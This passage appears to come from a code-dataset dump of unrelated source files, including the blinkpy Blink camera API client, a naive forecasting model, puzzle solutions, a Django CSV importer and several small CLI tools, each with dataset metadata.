round(sorted(self.NormDistribution[column][row])[1],2)\n elif entryset != 2:\n assert(0),\"Invalid entry set\"\n\n # Decrease\n for key,val in DistDec.items():\n row = H.GetKeyByValue(H.GetCusineMap(),(H.GetKeyByValue(H.GetCusineType(),key,False)),True)\n column = H.GetKeyByValue(H.GetZoneMap(),val,True)\n if column not in column_list:\n column_list.append(column)\n if entryset == 0:\n ZoneEntry[row][column] = round(max(self.NormDistribution[column][row]),2)\n elif entryset == 1:\n ZoneEntry[row][column] = round(sorted(set(self.NormDistribution[column][row]))[-2],2)\n elif entryset == 3:\n ZoneEntry[row][column] = round(sorted(self.NormDistribution[column][row])[1],2)\n elif entryset == 4:\n ZoneEntry[row][column] = round(min(self.NormDistribution[column][row]),2)\n elif entryset != 2:\n assert(0),\"Invalid entry set\"\n\n ## Adjust the remaining entries\n sum_val = 0\n for row in range(0,len(ZoneEntry)):\n sum_val = sum(ZoneEntry[row])\n if 100 - sum_val >= 0:\n error = 100 - sum_val\n error1 = int(error)\n delta = error - error1\n while error1 > 0:\n column_val = random.randint(0,len(ZoneEntry[0])-1)\n if column_val not in column_list:\n ZoneEntry[row][column_val] += 1\n error1 -= 1\n column_val = random.randint(0,len(ZoneEntry[0])-1)\n ZoneEntry[row][column_val] += delta \n else:\n error = sum_val - 100\n error1 = int(error)\n delta = error - error1\n while error1 > 0:\n column_val = random.randint(0,len(ZoneEntry[0])-1)\n if column_val not in column_list:\n ZoneEntry[row][column_val] -= 1\n error1 -= 1\n column_val = random.randint(0,len(ZoneEntry[0])-1)\n ZoneEntry[row][column_val] -= delta\n\n assert (sum(ZoneEntry[row]) == 100), \"Incorrect adjustment for remaining entries\"\n\n # Add rounding correction\n for row in range(0,len(ZoneEntry)):\n for column in range(0,len(ZoneEntry[0])):\n ZoneEntry[row][column] = math.floor((ZoneEntry[row][column] * self.Cusine_val[row])/100)\n H.RoundingCorrection(ZoneEntry[row],self.Cusine_val[row],len(ZoneEntry[row]))\n\n # Validate rounding correction\n self.ValidateCorrection(ZoneEntry,self.Cusine_val)\n\n max_length = 0;\n for key,val in H.GetCusineType().items():\n if len(val) > max_length:\n max_length = len(val)\n\n # Add rounding correction\n Cusine_Entry = 
np.zeros((len(H.GetCusineMap()),len(H.GetZoneMap()),max_length))\n for row in range(0,len(ZoneEntry)): \n Cusine_len = len(H.GetCusineType().get((H.GetCusineMap().get(row))))\n for column in range(0,len(ZoneEntry[0])):\n for val in range(0,Cusine_len):\n Cusine_Entry[row][column][val] = math.floor(ZoneEntry[row][column]/Cusine_len)\n H.RoundingCorrection(Cusine_Entry[row][column],ZoneEntry[row][column],Cusine_len)\n # Validate rounding correction\n self.ValidateCorrection(Cusine_Entry[row],ZoneEntry[row])\n #print(\"\\nError corrected Zone distribution\\n\")\n #print(ZoneEntry)\n\n #return ZoneEntry\n return Cusine_Entry,max_length\n","sub_path":"1_code/TimeVariation/TimeVariation/GenerateEntrySet.py","file_name":"GenerateEntrySet.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"275556402","text":"import sys\nimport argparse\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument('path', type=str, default='There is no path', help='This is the file path')\narg_obj = parser.parse_args()\npath = arg_obj.path\nprint(path)\n\n\nwith open(path) as file_ob:\n data_json = json.load(file_ob)\n\nprint(data_json)","sub_path":"first_class_assignment/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"211892015","text":"def answer(total_lambs):\n \n # Here's how I solved it..\n \n # From the promblem we know:\n # MIN Paycheck = sum of previous 2 paychecks\n # MAX Paycheck = x2 previous paycheck\n \n # I wrote the function \"calc_paychecks\" that\n # builds lists of paychecks from these rules. \n \n # ex. total_lambs = 5\n # min_paychecks = [1, 1, 2]\n # max_paychecks = [1, 2]\n\n # The function also handles remaining lambs.\n # When remaining lambs CANNOT pay a FULL paycheck\n # but CAN pay more at least the min_paycheck - \n # then henchmen is still hired.\n \n # ex. 
total_lambs = 6\n # min_paychecks = [1, 1, 2]\n # max_paychecks = [1, 2, 3] <- 3 is remainder\n\n def calc_paychecks(total_lambs, max_min):\n\n # Problem says first paycheck is 1 lamb \n paychecks = [0,1]\n \n # While there's money left keep hiring henchmen\n while sum(paychecks) < total_lambs:\n # Previous two paychecks\n prev_paycheck_1 = paychecks[-1]\n prev_paycheck_2 = paychecks[-2]\n # Maxmum / Minimum possible paychecks\n max_paycheck = prev_paycheck_1 * 2\n min_paycheck = prev_paycheck_1 + prev_paycheck_2\n \n if max_min == \"max\":\n paycheck = max_paycheck\n elif max_min == \"min\":\n paycheck = min_paycheck\n \n remainder = total_lambs - sum(paychecks)\n \n # If remainder can pay FULL salary...\n if remainder >= paycheck:\n paychecks.append(paycheck)\n continue\n # If remainder CANNOT pay FULL salary\n # but CAN pay more than min_paycheck...\n elif remainder >= min_paycheck:\n if max_min == \"max\":\n paychecks.append(remainder)\n elif max_min == \"min\":\n paychecks.append(min_paycheck)\n # If remainder CANNOT pay more than min_paycheck\n # We're outta lambs, can't afford another paycheck.\n else:\n break\n \n return paychecks\n\n # Find MAX and MIN number of paychecks\n min_paychecks = calc_paychecks(total_lambs, \"min\")\n max_paychecks = calc_paychecks(total_lambs, \"max\")\n\n # Solution is min-cost-solution minus max-cost-solution!\n solution = len(min_paychecks) - len(max_paychecks)\n\n return solution\n \n","sub_path":"level2/lovely_lucky_lambs.py","file_name":"lovely_lucky_lambs.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"38660217","text":"import csv\nfrom datetime import date\nfrom django.core.management.base import BaseCommand\nfrom phones.models import Phone\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n with open('phones.csv', 'r') as csvfile:\n for line in csv.DictReader(csvfile, delimiter=';'):\n try:\n line['price'] = int(line['price'])\n line['release_date'] = date.fromisoformat(line['release_date'])\n line['lte_exists'] = line['lte_exists'] == 'True'\n except (ValueError, KeyError):\n continue\n if None in line:\n del(line[None])\n phone = Phone(**dict(line))\n phone.save()","sub_path":"work_with_database/phones/management/commands/import_phones.py","file_name":"import_phones.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"273588142","text":"# -*- coding: utf-8 -*-\n\"\"\"\nblinkpy is an unofficial api for the Blink security camera system.\n\nrepo url: https://github.com/fronzbot/blinkpy\n\nOriginal protocol hacking by MattTW :\nhttps://github.com/MattTW/BlinkMonitorProtocol\n\nPublished under the MIT license - See LICENSE file for more details.\n\"Blink Wire-Free HS Home Monitoring & Alert Systems\" is a trademark\nowned by Immedia Inc., see www.blinkforhome.com for more information.\nblinkpy is in no way affiliated with Blink, nor Immedia Inc.\n\"\"\"\n\nimport os.path\nimport time\nimport logging\nfrom shutil import copyfileobj\n\nfrom requests.structures import CaseInsensitiveDict\nfrom dateutil.parser import parse\nfrom slugify import slugify\n\nfrom blinkpy import api\nfrom blinkpy.sync_module import BlinkSyncModule\nfrom blinkpy.helpers.util import (\n create_session,\n merge_dicts,\n get_time,\n BlinkURLHandler,\n Throttle,\n)\nfrom blinkpy.helpers.constants import (\n BLINK_URL,\n 
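A compact way to see the two bounds above: the stingiest schedule pays Fibonacci salaries, while the most generous doubles each time, so both headcounts are prefix-sum cutoffs. A sketch that ignores the partial-remainder rule the original handles:

def hires(total_lambs, next_pay):
    # next_pay maps (prev, prev_prev) to the next full paycheck.
    pay, prev = 1, 0
    paid = hired = 0
    while paid + pay <= total_lambs:
        paid += pay
        hired += 1
        pay, prev = next_pay(pay, prev), pay
    return hired

print(hires(10, lambda p, q: 2 * p))   # generous, doubling: 1+2+4 -> 3 henchmen
print(hires(10, lambda p, q: p + q))   # stingy, Fibonacci: 1+1+2+3 -> 4 henchmen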
DEFAULT_MOTION_INTERVAL,\n DEFAULT_REFRESH,\n MIN_THROTTLE_TIME,\n LOGIN_URLS,\n)\nfrom blinkpy.helpers.constants import __version__\nfrom blinkpy.login_handler import LoginHandler\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass Blink:\n \"\"\"Class to initialize communication.\"\"\"\n\n def __init__(\n self,\n username=None,\n password=None,\n cred_file=None,\n refresh_rate=DEFAULT_REFRESH,\n motion_interval=DEFAULT_MOTION_INTERVAL,\n legacy_subdomain=False,\n no_prompt=False,\n persist_key=None,\n device_id=\"Blinkpy\",\n ):\n \"\"\"\n Initialize Blink system.\n\n :param username: Blink username (usually email address)\n :param password: Blink password\n :param cred_file: JSON formatted file to store credentials.\n If username and password are given, file\n is ignored. Otherwise, username and password\n are loaded from file.\n :param refresh_rate: Refresh rate of blink information.\n Defaults to 15 (seconds)\n :param motion_interval: How far back to register motion in minutes.\n Defaults to last refresh time.\n Useful for preventing motion_detected property\n from de-asserting too quickly.\n :param legacy_subdomain: Set to TRUE to use old 'rest.region'\n endpoints (only use if you are having\n api issues).\n :param no_prompt: Set to TRUE if using an implementation that needs to\n suppress command-line output.\n :param persist_key: Location of persistant identifier.\n :param device_id: Identifier for the application. Default is 'Blinkpy'.\n This is used when logging in and should be changed to\n fit the implementation (ie. \"Home Assistant\" in a\n Home Assistant integration).\n \"\"\"\n self.login_handler = LoginHandler(\n username=username,\n password=password,\n cred_file=cred_file,\n persist_key=persist_key,\n device_id=device_id,\n )\n self._token = None\n self._auth_header = None\n self._host = None\n self.account_id = None\n self.client_id = None\n self.network_ids = []\n self.urls = None\n self.sync = CaseInsensitiveDict({})\n self.region = None\n self.region_id = None\n self.last_refresh = None\n self.refresh_rate = refresh_rate\n self.session = create_session()\n self.networks = []\n self.cameras = CaseInsensitiveDict({})\n self.video_list = CaseInsensitiveDict({})\n self.login_url = LOGIN_URLS[0]\n self.login_urls = []\n self.motion_interval = motion_interval\n self.version = __version__\n self.legacy = legacy_subdomain\n self.no_prompt = no_prompt\n self.available = False\n self.key_required = False\n self.login_response = {}\n\n @property\n def auth_header(self):\n \"\"\"Return the authentication header.\"\"\"\n return self._auth_header\n\n def start(self):\n \"\"\"\n Perform full system setup.\n\n Method logs in and sets auth token, urls, and ids for future requests.\n Essentially this is just a wrapper function for ease of use.\n \"\"\"\n if not self.available:\n self.get_auth_token()\n\n if self.key_required and not self.no_prompt:\n email = self.login_handler.data[\"username\"]\n key = input(\"Enter code sent to {}: \".format(email))\n result = self.login_handler.send_auth_key(self, key)\n self.key_required = not result\n self.setup_post_verify()\n elif not self.key_required:\n self.setup_post_verify()\n\n def setup_post_verify(self):\n \"\"\"Initialize blink system after verification.\"\"\"\n camera_list = self.get_cameras()\n networks = self.get_ids()\n for network_name, network_id in networks.items():\n if network_id not in camera_list.keys():\n camera_list[network_id] = {}\n _LOGGER.warning(\"No cameras found for %s\", network_name)\n sync_module = 
BlinkSyncModule(\n self, network_name, network_id, camera_list[network_id]\n )\n sync_module.start()\n self.sync[network_name] = sync_module\n self.cameras = self.merge_cameras()\n self.available = self.refresh()\n self.key_required = False\n\n def login(self):\n \"\"\"Perform server login. DEPRECATED.\"\"\"\n _LOGGER.warning(\n \"Method is deprecated and will be removed in a future version. Please use the LoginHandler.login() method instead.\"\n )\n return self.login_handler.login(self)\n\n def get_auth_token(self, is_retry=False):\n \"\"\"Retrieve the authentication token from Blink.\"\"\"\n self.login_response = self.login_handler.login(self)\n if not self.login_response:\n self.available = False\n return False\n self.setup_params(self.login_response)\n if self.login_handler.check_key_required(self):\n self.key_required = True\n return self._auth_header\n\n def setup_params(self, response):\n \"\"\"Retrieve blink parameters from login response.\"\"\"\n self.login_url = self.login_handler.login_url\n ((self.region_id, self.region),) = response[\"region\"].items()\n self._host = \"{}.{}\".format(self.region_id, BLINK_URL)\n self._token = response[\"authtoken\"][\"authtoken\"]\n self._auth_header = {\"Host\": self._host, \"TOKEN_AUTH\": self._token}\n self.urls = BlinkURLHandler(self.region_id, legacy=self.legacy)\n self.networks = self.get_networks()\n self.client_id = response[\"client\"][\"id\"]\n self.account_id = response[\"account\"][\"id\"]\n\n def get_networks(self):\n \"\"\"Get network information.\"\"\"\n response = api.request_networks(self)\n try:\n return response[\"summary\"]\n except KeyError:\n return None\n\n def get_ids(self):\n \"\"\"Set the network ID and Account ID.\"\"\"\n all_networks = []\n network_dict = {}\n for network, status in self.networks.items():\n if status[\"onboarded\"]:\n all_networks.append(\"{}\".format(network))\n network_dict[status[\"name\"]] = network\n\n self.network_ids = all_networks\n return network_dict\n\n def get_cameras(self):\n \"\"\"Retrieve a camera list for each onboarded network.\"\"\"\n response = api.request_homescreen(self)\n try:\n all_cameras = {}\n for camera in response[\"cameras\"]:\n camera_network = str(camera[\"network_id\"])\n camera_name = camera[\"name\"]\n camera_id = camera[\"id\"]\n camera_info = {\"name\": camera_name, \"id\": camera_id}\n if camera_network not in all_cameras:\n all_cameras[camera_network] = []\n\n all_cameras[camera_network].append(camera_info)\n return all_cameras\n except KeyError:\n _LOGGER.error(\"Initialization failure. 
Could not retrieve cameras.\")\n return {}\n\n @Throttle(seconds=MIN_THROTTLE_TIME)\n def refresh(self, force_cache=False):\n \"\"\"\n Perform a system refresh.\n\n :param force_cache: Force an update of the camera cache\n \"\"\"\n if self.check_if_ok_to_update() or force_cache:\n for sync_name, sync_module in self.sync.items():\n _LOGGER.debug(\"Attempting refresh of sync %s\", sync_name)\n sync_module.refresh(force_cache=force_cache)\n if not force_cache:\n # Prevents rapid clearing of motion detect property\n self.last_refresh = int(time.time())\n return True\n return False\n\n def check_if_ok_to_update(self):\n \"\"\"Check if it is ok to perform an http request.\"\"\"\n current_time = int(time.time())\n last_refresh = self.last_refresh\n if last_refresh is None:\n last_refresh = 0\n if current_time >= (last_refresh + self.refresh_rate):\n return True\n return False\n\n def merge_cameras(self):\n \"\"\"Merge all sync camera dicts into one.\"\"\"\n combined = CaseInsensitiveDict({})\n for sync in self.sync:\n combined = merge_dicts(combined, self.sync[sync].cameras)\n return combined\n\n def download_videos(self, path, since=None, camera=\"all\", stop=10, debug=False):\n \"\"\"\n Download all videos from server since specified time.\n\n :param path: Path to write files. /path/_.mp4\n :param since: Date and time to get videos from.\n Ex: \"2018/07/28 12:33:00\" to retrieve videos since\n July 28th 2018 at 12:33:00\n :param camera: Camera name to retrieve. Defaults to \"all\".\n Use a list for multiple cameras.\n :param stop: Page to stop on (~25 items per page. Default page 10).\n :param debug: Set to TRUE to prevent downloading of items.\n Instead of downloading, entries will be printed to log.\n \"\"\"\n if since is None:\n since_epochs = self.last_refresh\n else:\n parsed_datetime = parse(since, fuzzy=True)\n since_epochs = parsed_datetime.timestamp()\n\n formatted_date = get_time(time_to_convert=since_epochs)\n _LOGGER.info(\"Retrieving videos since %s\", formatted_date)\n\n if not isinstance(camera, list):\n camera = [camera]\n\n for page in range(1, stop):\n response = api.request_videos(self, time=since_epochs, page=page)\n _LOGGER.debug(\"Processing page %s\", page)\n try:\n result = response[\"media\"]\n if not result:\n raise IndexError\n except (KeyError, IndexError):\n _LOGGER.info(\"No videos found on page %s. 
Exiting.\", page)\n break\n\n self._parse_downloaded_items(result, camera, path, debug)\n\n def _parse_downloaded_items(self, result, camera, path, debug):\n \"\"\"Parse downloaded videos.\"\"\"\n for item in result:\n try:\n created_at = item[\"created_at\"]\n camera_name = item[\"device_name\"]\n is_deleted = item[\"deleted\"]\n address = item[\"media\"]\n except KeyError:\n _LOGGER.info(\"Missing clip information, skipping...\")\n continue\n\n if camera_name not in camera and \"all\" not in camera:\n _LOGGER.debug(\"Skipping videos for %s.\", camera_name)\n continue\n\n if is_deleted:\n _LOGGER.debug(\"%s: %s is marked as deleted.\", camera_name, address)\n continue\n\n clip_address = \"{}{}\".format(self.urls.base_url, address)\n filename = \"{}-{}\".format(camera_name, created_at)\n filename = \"{}.mp4\".format(slugify(filename))\n filename = os.path.join(path, filename)\n\n if not debug:\n if os.path.isfile(filename):\n _LOGGER.info(\"%s already exists, skipping...\", filename)\n continue\n\n response = api.http_get(self, url=clip_address, stream=True, json=False)\n with open(filename, \"wb\") as vidfile:\n copyfileobj(response.raw, vidfile)\n\n _LOGGER.info(\"Downloaded video to %s\", filename)\n else:\n print(\n (\"Camera: {}, Timestamp: {}, \" \"Address: {}, Filename: {}\").format(\n camera_name, created_at, address, filename\n )\n )\n","sub_path":"blinkpy/blinkpy.py","file_name":"blinkpy.py","file_ext":"py","file_size_in_byte":13018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"23277420","text":"def solution(n, lost, reserve):\n r_set = set(reserve)\n l_set = set(lost)\n real_r = r_set - l_set \n real_l = l_set - r_set\n helper= {}\n for e in real_r:\n helper[e] = list()\n if e-1 in real_l:\n helper[e].append(e-1)\n if e+1 in real_l:\n helper[e].append(e+1)\n\n h = sorted(helper.items())\n h = sorted(h, key = lambda x: len(x[1]))\n print(h)\n for e in h :\n if len(e[1]) == 1:\n if e[1][0] in real_l:\n real_l.remove(e[1][0])\n elif len(e[1]) == 2:\n if e[1][0] in real_l:\n real_l.remove(e[1][0])\n else :\n if e[1][1] in real_l:\n real_l.remove(e[1][1])\n \n return n - len(real_l)\n\n\ndef best_solution(n, lost, reserve):\n _reserve = [r for r in reserve if r not in lost]\n _lost = [l for l in lost if l not in reserve]\n for r in _reserve:\n f = r-1\n b = r+1\n if f in _lost :\n _lost.remove(f)\n elif b in _lost :\n _lost.remove(b)\n return n - len(_lost)\n\nn =5 \nlost = [2,4]\nreserve = [1,3,5]\n\nresult = solution(n, lost, reserve)\nprint(result)\n\n\n\n","sub_path":"greedy/workoutfit.py","file_name":"workoutfit.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"478982775","text":"__author__: 'Сакаев Александр Самигуллович'\n\n# task 1:\nfrom sys import argv\n\n\ndef salary(pay_rate, time_worked, bonus):\n wage = (pay_rate * time_worked) + bonus\n print(wage)\n\n\ntasks, a, b, c = argv\n\nsalary(float(a), float(b), float(c))\n\n# task 2:\na = list(map(int, input('Enter numbers: ').split()))\nresult = [numbers for i, numbers in enumerate(a) if i > 0 and a[i] > a[i - 1]]\nprint(result)\n\n# task 3:\nresult = [i for i in range(20, 240) if i % 20 == 0 or i % 21 == 0]\nprint(result)\n\n# task 4:\na = list(input('Enter numbers: ').split())\nresult = [i for i in a if a.count(i) == 1]\nprint(result)\n\n# task 5:\nfrom functools import reduce\n\n\ndef funk(a, b):\n return a * b\n\n\nresult = [i for i in range(99, 1001) if i % 2 == 
0]\nprint(reduce(funk, result))\n\n# task 6:\nfrom itertools import count\n\nfor element in count(3):\n if element > 10:\n break\n else:\n print(element)\n\nfrom itertools import cycle\n\nl = ['a', 'b', 'c', 'd']\nx = 0\nfor i in cycle(l):\n x += 1\n if x > 10:\n break\n else:\n print(i)\n\n\n# task 7:\ndef fact(n):\n x = 1\n for i in range(1, n + 1):\n x *= i\n yield x\n\n\nn = int(input('Enter number: '))\nfor i in fact(n):\n print(i)\n","sub_path":"lesson_4/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"325954130","text":"import numpy as np\n\nclass NaiveModel:\n def __init__ (self, threshold=0.5, regularization=False):\n self.threshold = threshold\n self.regularization = regularization\n \n def train (self, X, Y):\n Y1 = np.matrix (Y).transpose().tolist()\n y1_rows = len (Y1)\n y1_cols = len (Y1[0])\n self.output_size = y1_rows\n \n def predict (self, input):\n out = self.output_size * [0]\n for i in range (0, self.output_size):\n out[i] = input [len (input)- self.output_size+i]\n return out\n\n\n def test_model (self, input, output, verbose=True):\n total_l2_error = 0\n total_l1_error = 0\n predictions = []\n \n for i in range (len (output)):\n prediction = self.predict (input[i])\n predictions.append (prediction)\n err = self.l2_error (output[i], prediction)\n total_l2_error += err\n err = self.l1_error (output[i], prediction)\n total_l1_error += err\n if verbose:\n print (str (i+1)+ \") \")\n print (\"\\tActual\\t\\tPredicted\")\n for prod in range (0, len (output[i])):\n print (\"\\t\"+str(output [i][prod])+\"\\t\\t\"+str(prediction[prod]))\n #print (\"Actual: \" + str(output[i]))\n #print (\"Predicted: \"+ str(prediction))\n print (\"L2 Error: \" + str (err))\n print (\"Std Dev: \" + str ((err/len (output[i])) ** (0.5)))\n print (\"\")\n total_l2_error = total_l2_error / len (output)\n print (\"Average Error L2: \" + str (total_l2_error))\n \n rmsd = (total_l2_error / len (output[0]))**0.5\n print (\"RMSD: \" + str(rmsd))\n \n total_l1_error = total_l1_error / len (output)\n print (\"Average Error L1: \" + str (total_l2_error))\n \n average_deviation = (total_l1_error / len (output[0]))\n print (\"Average Deviation per Query: \" + str(average_deviation))\n \n #coeffs = self.coeff_of_determination (output, predictions)\n #print (\"Coefficients of determination: \" + str (coeffs))\n \n cntng_table = self.contingency_table (output, predictions)\n print (cntng_table[0])\n \n def l1_error (self, real, prediction):\n error = 0\n for i in range (len (real)):\n error += abs(real[i] - prediction[i])\n return error\n\n def l2_error (self, real, prediction):\n error = 0\n for i in range (len (real)):\n error += (real[i] - prediction[i]) ** 2\n return error\n\n def mean (self, list):\n return sum (list) / len (list)\n \n def variance (self, list):\n mean = self.mean (list)\n variance = 0\n for value in list:\n variance += (value - mean) ** 2\n return variance / len(list)\n\n \"\"\"\n Returns a contingency table\n \"\"\"\n def contingency_table (self, real, prediction):\n table = []\n for i in range (0, len (real[0])):\n table.append ([0, 0, 0, 0])\n for b in range (0, len (real)):\n if (real[b][i] == 1):\n if (prediction [b][i] >= self.threshold):\n table[i][0] += 1 # True positive\n else:\n table[i][2] += 1 # False negative\n else:\n if (prediction[b][i] >= self.threshold):\n table[i][1] += 1 # False positive\n else:\n table[i][3] += 1 # True negative\n return 
table\n\n\n","sub_path":"forecaster/models/NaiveModel.py","file_name":"NaiveModel.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"61090532","text":"# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom jupyter_server.gateway.connections import GatewayWebSocketConnection\nfrom jupyter_server.gateway.managers import GatewayKernelManager\nfrom jupyter_server.services.kernels.connection.base import BaseKernelWebsocketConnection\nfrom jupyter_server.services.kernels.connection.channels import ZMQChannelsWebsocketConnection\n\nclass DelegatingWebsocketConnection(BaseKernelWebsocketConnection):\n \"\"\"Implementation of BaseKernelWebsocketConnection that delegates to another connection.\n\n If the parent KernelManager instance is for a remote kernel (i.e. it is a\n GatewayKernelManager), then the delegate is an instance of GatewayWebSocketConnection.\n\n Otherwise, it is an instance of ZMQChannelsWebsocketConnection.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n delegate_class = ZMQChannelsWebsocketConnection\n if self.kernel_manager.is_remote:\n delegate_class = GatewayWebSocketConnection\n self.delegate = delegate_class(\n parent=self.kernel_manager.delegate,\n websocket_handler=self.websocket_handler,\n config=self.config)\n\n async def connect(self):\n return await self.delegate.connect()\n\n async def disconnect(self):\n return await self.delegate.disconnect()\n\n def handle_incoming_message(self, msg):\n return self.delegate.handle_incoming_message(msg)\n\n def handle_outgoing_message(self, stream, msg):\n return self.delegate.handle_outgoing_message(stream, msg)\n\n # Prepare actually comes from ZMQChannelsWebsocketConnection.\n #\n # It is called by the jupyter_server kernels websocket handler if present, so\n # we provide an implemention of it in case the delegate is an instance of the\n # ZMQChannelWebsocketConnection class.\n async def prepare(self):\n if hasattr(self.delegate, \"prepare\"):\n return await self.delegate.prepare()\n","sub_path":"kernels-mixer/kernels_mixer/websockets.py","file_name":"websockets.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"7712172","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/taurus/qt/qtgui/qwt5/cli.py\n# Compiled at: 2019-08-19 15:09:30\nimport click\nfrom .taurustrend import TaurusTrend\n\n@click.group('qwt5')\ndef qwt5():\n \"\"\"Qwt5 related commands\"\"\"\n pass\n\n\n@qwt5.command('plot')\n@click.argument('models', nargs=-1)\n@click.option('--config', 'config_file', type=click.File('rb'), help='configuration file for initialization')\n@click.option('-x', '--x-axis-mode', 'x_axis_mode', type=click.Choice(['t', 'n']), 
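Each per-class row of the contingency table built above is [TP, FP, FN, TN], so the usual derived metrics read off directly; a small helper assuming that layout:

def precision_recall(row):
    # row = [true_pos, false_pos, false_neg, true_neg], as produced by contingency_table.
    tp, fp, fn, tn = row
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    recall = tp / (tp + fn) if (tp + fn) else 0.0
    return precision, recall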
default='n', show_default=True, help='X axis mode. \"t\" implies using a Date axis' + '\"n\" uses the regular axis')\n@click.option('--demo', is_flag=True, help='show a demo of the widget')\n@click.option('--window-name', 'window_name', default='TaurusPlot (qwt5)', help='Name of the window')\ndef plot_cmd(models, config_file, x_axis_mode, demo, window_name):\n \"\"\"Shows a plot for the given models\"\"\"\n from .taurusplot import plot_main\n return plot_main(models=models, config_file=config_file, x_axis_mode=x_axis_mode, demo=demo, window_name=window_name)\n\n\n@qwt5.command('trend')\n@click.argument('models', nargs=-1)\n@click.option('-x', '--x-axis-mode', 'x_axis_mode', type=click.Choice(['t', 'n']), default='n', show_default=True, help='X axis mode. \"t\" implies using a Date axis' + '\"n\" uses the regular axis')\n@click.option('-a', '--use-archiving', 'use_archiving', is_flag=True, default=False, help='enable automatic archiving queries')\n@click.option('-b', '--buffer', 'max_buffer_size', type=int, default=TaurusTrend.DEFAULT_MAX_BUFFER_SIZE, show_default=True, help='maximum number of values per curve to be plotted')\n@click.option('-r', '--forced-read', 'forced_read_period', type=int, default=-1, metavar='MILLISECONDS', help='force re-reading of the attributes every MILLISECONDS ms')\n@click.option('--config', 'config_file', type=click.File('rb'), help='configuration file for initialization')\n@click.option('--demo', is_flag=True, help='show a demo of the widget')\n@click.option('--window-name', 'window_name', default='TaurusPlot (qwt5)', help='Name of the window')\ndef trend_cmd(models, x_axis_mode, use_archiving, max_buffer_size, forced_read_period, config_file, demo, window_name):\n \"\"\"Shows a trend for the given models\"\"\"\n from .taurustrend import trend_main\n return trend_main(models=models, config_file=config_file, x_axis_mode=x_axis_mode, use_archiving=use_archiving, max_buffer_size=max_buffer_size, forced_read_period=forced_read_period, demo=demo, window_name=window_name)\n\n\nif __name__ == '__main__':\n qwt5()","sub_path":"pycfiles/taurus-4.6.1-py2.7/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"312174897","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2017 - Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Handle storage API.\"\"\"\n\nimport click\nimport requests\n\nfrom renga.client import RengaClient\nfrom renga.client.storage import CreateBucket\n\nfrom ._config import config_path, with_config\nfrom ._options import option_endpoint\nfrom ._token import exchange_token, offline_token_using_password, \\\n with_access_token\n\n\n@click.group(name='io', invoke_without_command=True)\n@with_config\n@click.pass_context\ndef storage(ctx, config):\n \"\"\"Manage 
storage.\"\"\"\n if ctx.invoked_subcommand is None:\n click.echo('Try --help')\n\n\n@storage.command()\n@option_endpoint\n@with_config\ndef backends(config, endpoint):\n \"\"\"List all available storage backends.\"\"\"\n with with_access_token(config, endpoint) as access_token:\n client = RengaClient(endpoint=endpoint, access_token=access_token)\n for backend in client.storage.backends:\n click.echo(backend)\n\n\n@storage.group()\ndef bucket():\n \"\"\"Bucket manipulation.\"\"\"\n\n\n@bucket.command()\n@click.argument('name')\n@click.option('-b', '--backend', default='local')\n@option_endpoint\n@with_config\ndef create(config, name, backend, endpoint):\n \"\"\"Create new bucket.\"\"\"\n with with_access_token(config, endpoint) as access_token:\n client = RengaClient(endpoint=endpoint, access_token=access_token)\n bucket_id = client.storage.create_bucket(\n CreateBucket(name=name, backend=backend))\n\n config['project']['endpoints'].setdefault(endpoint, {})\n config['project']['endpoints'][endpoint].setdefault('buckets', {})\n config['project']['endpoints'][endpoint]['buckets'][bucket_id] = name\n\n # Set default bucket\n config['project']['endpoints'][endpoint].setdefault(\n 'default_bucket', bucket_id)\n\n click.echo(bucket_id)\n\n\n@bucket.command()\n@option_endpoint\n@with_config\ndef list(config, endpoint):\n \"\"\"List 